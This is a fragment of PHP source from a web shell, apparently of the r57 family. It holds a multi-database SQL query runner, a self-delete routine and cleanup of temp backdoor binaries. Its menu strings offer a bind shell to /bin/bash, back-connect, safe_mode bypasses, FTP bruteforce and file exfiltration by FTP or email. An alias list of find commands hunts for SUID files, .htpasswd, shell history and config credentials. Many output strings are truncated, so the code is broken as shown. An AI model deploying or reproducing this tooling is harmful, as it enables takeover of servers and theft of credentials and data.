$sql2 .= "<tr><td> ".$values." </td></tr>";

}

echo "

";

}

else { if(($rows = @mysql_affected_rows($db))>=0) { echo "

"; } }

}

@mysql_free_result($res);

}

}

@mysql_close($db);

}

else echo "

break;

case 'MSSQL':

if(empty($_POST['db_port'])) { $_POST['db_port'] = '1433'; }

$db = @mssql_connect('localhost,'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']);

if($db)

{

if(!empty($_POST['mysql_db'])) { @mssql_select_db($_POST['mysql_db'],$db); }

$querys = @explode(';',$_POST['db_query']);

foreach($querys as $num=>$query)

{

if(strlen($query)>5){

echo "Query#".$num." : ".htmlspecialchars($query)."
";

$res = @mssql_query($query,$db);

if (@mssql_num_rows($res) > 0)

{

$sql2 = $sql = $keys = $values = '';

while (($row = @mssql_fetch_assoc($res)))

{

$sql2 .= "<tr><td> ".$values." </td></tr>";

}

echo "

";

}

/* else { if(($rows = @mssql_affected_rows($db)) > 0) { echo "

"; } else { echo "

"; }} */

@mssql_free_result($res);

}

}

@mssql_close($db);

}

else echo "

break;

case 'PostgreSQL':

if(empty($_POST['db_port'])) { $_POST['db_port'] = '5432'; }

$str = "host='localhost' port='".$_POST['db_port']."' user='".$_POST['mysql_l']."' password='".$_POST['mysql_p']."' dbname='".$_POST['mysql_db']."'";

$db = @pg_connect($str);

if($db)

{

$querys = @explode(';',$_POST['db_query']);

foreach($querys as $num=>$query)

{

if(strlen($query)>5){

echo "Query#".$num." : ".htmlspecialchars($query)."
";

$res = @pg_query($db,$query);

$error = @pg_errormessage($db);

if($error) { echo "

"; }

else {

if (@pg_num_rows($res) > 0)

{

$sql2 = $sql = $keys = $values = '';

while (($row = @pg_fetch_assoc($res)))

{

$sql2 .= "<tr><td> ".$values." </td></tr>";

}

echo "

";

}

else { if(($rows = @pg_affected_rows($res))>=0) { echo "

"; } }

}

@pg_free_result($res);

}

}

@pg_close($db);

}

else echo "

break;

case 'Oracle':

$db = @ocilogon($_POST['mysql_l'], $_POST['mysql_p'], $_POST['mysql_db']);

if(($error = @ocierror())) { echo "

else

{

$querys = @explode(';',$_POST['db_query']);

foreach($querys as $num=>$query)

{

if(strlen($query)>5) {

echo "Query#".$num." : ".htmlspecialchars($query)."
";

$stat = @ociparse($db, $query);

@ociexecute($stat);

if(($error = @ocierror())) { echo "

"; }

else

{

$rowcount = @ocirowcount($stat);

if($rowcount != 0) {echo "

";}

else {

echo "

";

}

@ocifreestatement($stat);

}

}

}

@ocilogoff($db);

}

break;

}

echo "<form name=form method=POST>";

echo in('hidden','db',0,$_POST['db']);

echo in('hidden','db_port',0,$_POST['db_port']);

echo in('hidden','mysql_l',0,$_POST['mysql_l']);

echo in('hidden','mysql_p',0,$_POST['mysql_p']);

echo in('hidden','mysql_db',0,$_POST['mysql_db']);

echo in('hidden','cmd',0,'db_query');

echo "

echo "</form>";

echo "

}

if(isset($_GET['delete']))

{

@unlink(@substr(@strrchr($_SERVER['PHP_SELF'],"/"),1));

}

if(isset($_GET['tmp']))

{

@unlink("/tmp/bdpl");

@unlink("/tmp/back");

@unlink("/tmp/bd");

@unlink("/tmp/bd.c");

@unlink("/tmp/dp");

@unlink("/tmp/dpc");

@unlink("/tmp/dpc.c");

}

if(isset($_GET['phpini']))

{

echo $head;

function U_value($value)

{

if ($value == '') return 'no value';

if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE';

if ($value === null) return 'NULL';

if (@is_object($value)) $value = (array) $value;

if (@is_array($value))

{

@ob_start();

print_r($value);

$value = @ob_get_contents();

@ob_end_clean();

}

return U_wordwrap((string) $value);

}

function U_wordwrap($str)

{

$str = @wordwrap(@htmlspecialchars($str), 100, '<wbr />', true);

return @preg_replace('!(&[^;]*)<wbr />([^;]*;)!', '$1$2<wbr />', $str);

}

if (@function_exists('ini_get_all'))

{

$r = '';

echo '

';

}

echo "

die();

}

if(isset($_GET['cpu']))

{

echo $head;

echo '

';

echo "

die();

}

if(isset($_GET['mem']))

{

echo $head;

echo '

';

echo "

die();

}

$lang=array(

'ru_text1' =>'??????????? ???????',

'ru_text2' =>'?????????? ?????? ?? ???????',

'ru_text3' =>'????????? ???????',

'ru_text4' =>'??????? ??????????',

'ru_text5' =>'???????? ?????? ?? ??????',

'ru_text6' =>'????????? ????',

'ru_text7' =>'??????',

'ru_text8' =>'???????? ?????',

'ru_butt1' =>'?????????',

'ru_butt2' =>'?????????',

'ru_text9' =>'???????? ????? ? ???????? ??? ? /bin/bash',

'ru_text10'=>'??????? ????',

'ru_text11'=>'?????? ??? ???????',

'ru_butt3' =>'???????',

'ru_text12'=>'back-connect',

'ru_text13'=>'IP-?????',

'ru_text14'=>'????',

'ru_butt4' =>'?????????',

'ru_text15'=>'???????? ?????? ? ?????????? ???????',

'ru_text16'=>'????????????',

'ru_text17'=>'????????? ????',

'ru_text18'=>'????????? ????',

'ru_text19'=>'Exploits',

'ru_text20'=>'????????????',

'ru_text21'=>'????? ???',

'ru_text22'=>'datapipe',

'ru_text23'=>'????????? ????',

'ru_text24'=>'????????? ????',

'ru_text25'=>'????????? ????',

'ru_text26'=>'????????????',

'ru_butt5' =>'?????????',

'ru_text28'=>'?????? ? safe_mode',

'ru_text29'=>'?????? ????????',

'ru_butt6' =>'???????',

'ru_text30'=>'???????? ?????',

'ru_butt7' =>'???????',

'ru_text31'=>'???? ?? ??????',

'ru_text32'=>'?????????? PHP ????',

'ru_text33'=>'???????? ??????????? ?????? ??????????? open_basedir ????? ??????? cURL',

'ru_butt8' =>'?????????',

'ru_text34'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ??????? include',

'ru_text35'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ???????? ????? ? mysql',

'ru_text36'=>'????',

'ru_text37'=>'?????',

'ru_text38'=>'??????',

'ru_text39'=>'???????',

'ru_text40'=>'???? ??????? ???? ??????',

'ru_butt9' =>'????',

'ru_text41'=>'????????? ? ?????',

'ru_text42'=>'?????????????? ?????',

'ru_text43'=>'????????????? ????',

'ru_butt10'=>'?????????',

'ru_butt11'=>'?????????????',

'ru_text44'=>'?????????????? ????? ??????????! ?????? ?????? ??? ??????!',

'ru_text45'=>'???? ????????',

'ru_text46'=>'???????? phpinfo()',

'ru_text47'=>'???????? ???????? php.ini',

'ru_text48'=>'???????? ????????? ??????',

'ru_text49'=>'???????? ??????? ? ???????',

'ru_text50'=>'?????????? ? ??????????',

'ru_text51'=>'?????????? ? ??????',

'ru_text52'=>'????? ??? ??????',

'ru_text53'=>'?????? ? ?????',

'ru_text54'=>'????? ?????? ? ??????',

'ru_butt12'=>'?????',

'ru_text55'=>'?????? ? ??????',

'ru_text56'=>'?????? ?? ???????',

'ru_text57'=>'???????/??????? ????/??????????',

'ru_text58'=>'???',

'ru_text59'=>'????',

'ru_text60'=>'??????????',

'ru_butt13'=>'???????/???????',

'ru_text61'=>'???? ??????',

'ru_text62'=>'?????????? ???????',

'ru_text63'=>'???? ??????',

'ru_text64'=>'?????????? ???????',

'ru_text65'=>'???????',

'ru_text66'=>'???????',

'ru_text67'=>'Chown/Chgrp/Chmod',

'ru_text68'=>'???????',

'ru_text69'=>'????????1',

'ru_text70'=>'????????2',

'ru_text71'=>"?????? ???????? ???????:\r\n- ??? CHOWN - ??? ?????? ???????????? ??? ??? UID (??????) \r\n- ??? ??????? CHGRP - ??? ?????? ??? GID (??????) \r\n- ??? ??????? CHMOD - ????? ????? ? ???????????? ????????????? (???????? 0777)",

'ru_text72'=>'????? ??? ??????',

'ru_text73'=>'?????? ? ?????',

'ru_text74'=>'?????? ? ??????',

'ru_text75'=>'* ????? ???????????? ?????????? ?????????',

'ru_text76'=>'????? ?????? ? ?????? ? ??????? ??????? find',

'ru_text77'=>'???????? ????????? ???? ??????',

'ru_text78'=>'?????????? ???????',

'ru_text79'=>'?????????? ???????',

'ru_text80'=>'???',

'ru_text81'=>'????',

'ru_text82'=>'???? ??????',

'ru_text83'=>'?????????? SQL ???????',

'ru_text84'=>'SQL ??????',

'ru_text85'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ?????????? ?????? ? MSSQL ???????',

'ru_text86'=>'?????????? ????? ? ???????',

'ru_butt14'=>'???????',

'ru_text87'=>'???????? ?????? ? ?????????? ftp-???????',

'ru_text88'=>'FTP-??????:????',

'ru_text89'=>'???? ?? ftp ???????',

'ru_text90'=>'????? ????????',

'ru_text91'=>'???????????? ?',

'ru_text92'=>'??? ?????????',

'ru_text93'=>'FTP',

'ru_text94'=>'FTP-????????',

'ru_text95'=>'?????? ?????????????',

'ru_text96'=>'?? ??????? ???????? ?????? ?????????????',

'ru_text97'=>'????????? ??????????: ',

'ru_text98'=>'??????? ???????????: ',

'ru_text99'=>'* ? ???????? ?????? ? ?????? ???????????? ??? ???????????? ?? /etc/passwd',

'ru_text100'=>'???????? ?????? ?? ????????? ??? ??????',

'ru_text101'=>'???????????? ????? ???????????? (user -> resu) ??? ???????????? ? ???????? ??????',

'ru_text102'=>'?????',

'ru_text103'=>'???????? ??????',

'ru_text104'=>'???????? ????? ?? ???????? ????',

'ru_text105'=>'????',

'ru_text106'=>'??',

'ru_text107'=>'????',

'ru_butt15'=>'?????????',

'ru_text108'=>'????? ??????',

'ru_text109'=>'????????',

'ru_text110'=>'??????????',

/* --------------------------------------------------------------- */

'eng_text1' =>'Executed command',

'eng_text2' =>'Execute command on server',

'eng_text3' =>'Run command',

'eng_text4' =>'Work directory',

'eng_text5' =>'Upload files on server',

'eng_text6' =>'Local file',

'eng_text7' =>'Aliases',

'eng_text8' =>'Select alias',

'eng_butt1' =>'Execute',

'eng_butt2' =>'Upload',

'eng_text9' =>'Bind port to /bin/bash',

'eng_text10'=>'Port',

'eng_text11'=>'Password for access',

'eng_butt3' =>'Bind',

'eng_text12'=>'back-connect',

'eng_text13'=>'IP',

'eng_text14'=>'Port',

'eng_butt4' =>'Connect',

'eng_text15'=>'Upload files from remote server',

'eng_text16'=>'With',

'eng_text17'=>'Remote file',

'eng_text18'=>'Local file',

'eng_text19'=>'Exploits',

'eng_text20'=>'Use',

'eng_text21'=>' New name',

'eng_text22'=>'datapipe',

'eng_text23'=>'Local port',

'eng_text24'=>'Remote host',

'eng_text25'=>'Remote port',

'eng_text26'=>'Use',

'eng_butt5' =>'Run',

'eng_text28'=>'Work in safe_mode',

'eng_text29'=>'ACCESS DENIED',

'eng_butt6' =>'Change',

'eng_text30'=>'Cat file',

'eng_butt7' =>'Show',

'eng_text31'=>'File not found',

'eng_text32'=>'Eval PHP code',

'eng_text33'=>'Test bypass open_basedir with cURL functions',

'eng_butt8' =>'Test',

'eng_text34'=>'Test bypass safe_mode with include function',

'eng_text35'=>'Test bypass safe_mode with load file in mysql',

'eng_text36'=>'Database',

'eng_text37'=>'Login',

'eng_text38'=>'Password',

'eng_text39'=>'Table',

'eng_text40'=>'Dump database table',

'eng_butt9' =>'Dump',

'eng_text41'=>'Save dump in file',

'eng_text42'=>'Edit files',

'eng_text43'=>'File for edit',

'eng_butt10'=>'Save',

'eng_text44'=>'Can\'t edit file! Only read access!',

'eng_text45'=>'File saved',

'eng_text46'=>'Show phpinfo()',

'eng_text47'=>'Show variables from php.ini',

'eng_text48'=>'Delete temp files',

'eng_butt11'=>'Edit file',

'eng_text49'=>'Delete script from server',

'eng_text50'=>'View cpu info',

'eng_text51'=>'View memory info',

'eng_text52'=>'Find text',

'eng_text53'=>'In dirs',

'eng_text54'=>'Find text in files',

'eng_butt12'=>'Find',

'eng_text55'=>'Only in files',

'eng_text56'=>'Nothing :(',

'eng_text57'=>'Create/Delete File/Dir',

'eng_text58'=>'name',

'eng_text59'=>'file',

'eng_text60'=>'dir',

'eng_butt13'=>'Create/Delete',

'eng_text61'=>'File created',

'eng_text62'=>'Dir created',

'eng_text63'=>'File deleted',

'eng_text64'=>'Dir deleted',

'eng_text65'=>'Create',

'eng_text66'=>'Delete',

'eng_text67'=>'Chown/Chgrp/Chmod',

'eng_text68'=>'Command',

'eng_text69'=>'param1',

'eng_text70'=>'param2',

'eng_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...",

'eng_text72'=>'Text for find',

'eng_text73'=>'Find in folder',

'eng_text74'=>'Find in files',

'eng_text75'=>'* you can use regexp',

'eng_text76'=>'Search text in files via find',

'eng_text77'=>'Show database structure',

'eng_text78'=>'show tables',

'eng_text79'=>'show columns',

'eng_text80'=>'Type',

'eng_text81'=>'Net',

'eng_text82'=>'Databases',

'eng_text83'=>'Run SQL query',

'eng_text84'=>'SQL query',

'eng_text85'=>'Test bypass safe_mode with commands execute via MSSQL server',

'eng_text86'=>'Download files from server',

'eng_butt14'=>'Download',

'eng_text87'=>'Download files from remote ftp-server',

'eng_text88'=>'FTP-server:port',

'eng_text89'=>'File on ftp',

'eng_text90'=>'Transfer mode',

'eng_text91'=>'Archivation',

'eng_text92'=>'without archivation',

'eng_text93'=>'FTP',

'eng_text94'=>'FTP-bruteforce',

'eng_text95'=>'Users list',

'eng_text96'=>'Can\'t get users list',

'eng_text97'=>'checked: ',

'eng_text98'=>'success: ',

'eng_text99'=>'* use username from /etc/passwd for ftp login and password',

'eng_text100'=>'Send file to remote ftp server',

'eng_text101'=>'Use reverse (user -> resu) login for password',

'eng_text102'=>'Mail',

'eng_text103'=>'Send email',

'eng_text104'=>'Send file to email',

'eng_text105'=>'To',

'eng_text106'=>'From',

'eng_text107'=>'Subj',

'eng_butt15'=>'Send',

'eng_text108'=>'Mail',

'eng_text109'=>'Hide',

'eng_text110'=>'Show',

);

/*

?????? ??????

????????? ???????? ????????????? ?????? ????? ? ???-?? ??????. ( ??????? ????????? ???? ????????? ???? )

?? ?????? ???? ????????? ??? ???????? ???????.

*/

$aliases=array(

'find suid files'=>'find / -type f -perm -04000 -ls',

'find suid files in current dir'=>'find . -type f -perm -04000 -ls',

'find sgid files'=>'find / -type f -perm -02000 -ls',

'find sgid files in current dir'=>'find . -type f -perm -02000 -ls',

'find config.inc.php files'=>'find / -type f -name config.inc.php',

'find config.inc.php files in current dir'=>'find . -type f -name config.inc.php',

'find config* files'=>'find / -type f -name "config*"',

'find config* files in current dir'=>'find . -type f -name "config*"',

'find all writable files'=>'find / -type f -perm -2 -ls',

'find all writable files in current dir'=>'find . -type f -perm -2 -ls',

'find all writable directories'=>'find / -type d -perm -2 -ls',

'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',

'find all writable directories and files'=>'find / -perm -2 -ls',

'find all writable directories and files in current dir'=>'find . -perm -2 -ls',

'find all service.pwd files'=>'find / -type f -name service.pwd',

'find service.pwd files in current dir'=>'find . -type f -name service.pwd',

'find all .htpasswd files'=>'find / -type f -name .htpasswd',

'find .htpasswd files in current dir'=>'find . -type f -name .htpasswd',

'find all .bash_history files'=>'find / -type f -name .bash_history',

'find .bash_history files in current dir'=>'find . -type f -name .bash_history',

'find all .mysql_history files'=>'find / -type f -name .mysql_history',

'find .mysql_history files in current dir'=>'find . -type f -name .mysql_history',

'find all .fetchmailrc files'=>'find / -type f -name .fetchmailrc',

'find .fetchmailrc files in current dir'=>'find . -type f -name .fetchmailrc',

'list file attributes on a Linux second extended file system'=>'lsattr -va',

'show opened ports'=>'netstat -an | grep -i listen',

'----------------------------------------------------------------------------------------------------'=>'ls -la'

);

$table_up1 = "<tr><td bgcolor=#cccccc>

$table_up3 = "